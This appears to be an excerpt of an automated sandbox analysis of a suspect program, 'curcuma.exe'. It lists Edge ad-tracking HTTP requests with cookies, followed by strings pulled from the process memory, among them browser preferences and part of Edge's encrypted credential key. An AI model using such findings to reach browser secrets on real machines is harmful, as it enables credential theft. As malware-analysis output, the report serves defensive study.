Source: global trafficHTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0DDB686F4DAE69E20AF07DC74C2A6898%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0DDB686F4DAE69E20AF07DC74C2A6898%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync?redirect=%7BPubRedirectUrl%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=7be4f360-7a45-4690-9827-f98ea0750a81&ii=1&c=4886528655992380158&bid=0dc69f93-1809-4c34-890e-36ab305fca5b&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_Auth=; sptmarket=en-us||us|en-us|en-us|en||cf=8|RefA=1309CA76ED03451A921A0B8E388ABE7F.RefC=2025-03-07T16:50:24Z; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898
Source: global trafficHTTP traffic detected: GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=61926c86-c943-4aaa-9700-8c55594c9cc6&ii=1&c=8361246589242145283&bid=0dc69f93-1809-4c34-890e-36ab305fca5b&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_Auth=; sptmarket=en-us||us|en-us|en-us|en||cf=8|RefA=1309CA76ED03451A921A0B8E388ABE7F.RefC=2025-03-07T16:50:24Z; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898
Source: global trafficHTTP traffic detected: GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=infopane&i=15&p=edgechrntp&l=en-us&d=bing&b=Edg&a=c2d5071e-7ea2-4638-95e9-9e3dc320cc86&ii=1&c=15962976797232155595&bid=0dc69f93-1809-4c34-890e-36ab305fca5b&tid=edgechrntp-infopane-15&ptid=edgechrntp-peekinfopane-3&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_Auth=; sptmarket=en-us||us|en-us|en-us|en||cf=8|RefA=1309CA76ED03451A921A0B8E388ABE7F.RefC=2025-03-07T16:50:24Z; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898
Source: global trafficHTTP traffic detected: GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=80005825-8f03-421c-96d9-39c079d8b6a8&ii=1&c=7461836026324319374&bid=0dc69f93-1809-4c34-890e-36ab305fca5b&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_Auth=; sptmarket=en-us||us|en-us|en-us|en||cf=8|RefA=1309CA76ED03451A921A0B8E388ABE7F.RefC=2025-03-07T16:50:24Z; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898
Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0DDB686F4DAE69E20AF07DC74C2A6898%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0DDB686F4DAE69E20AF07DC74C2A6898%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0DDB686F4DAE69E20AF07DC74C2A6898%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0DDB686F4DAE69E20AF07DC74C2A6898%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: curcuma.exe, 00000025.00000003.1739334877.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABt~r equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @bing.com/videos/search www.facebook.com equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bing.com/videos/search www.facebook.com equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-3AtRQJCJTaCvAW3r8IbXW552FO059JGHecXNKsPqyDo=' 'strict-dynamic' equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-3AtRQJCJTaCvAW3r8IbXW552FO059JGHecXNKsPqyDo=' 'strict-dynamic' equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-3AtRQJCJTaCvAW3r8IbXW552FO059JGHecXNKsPqyDo=' 'strict-dynamic'@ equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-3AtRQJCJTaCvAW3r8IbXW552FO059JGHecXNKsPqyDo=' 'strict-dynamic'@ equals www.youtube.com (Youtube)
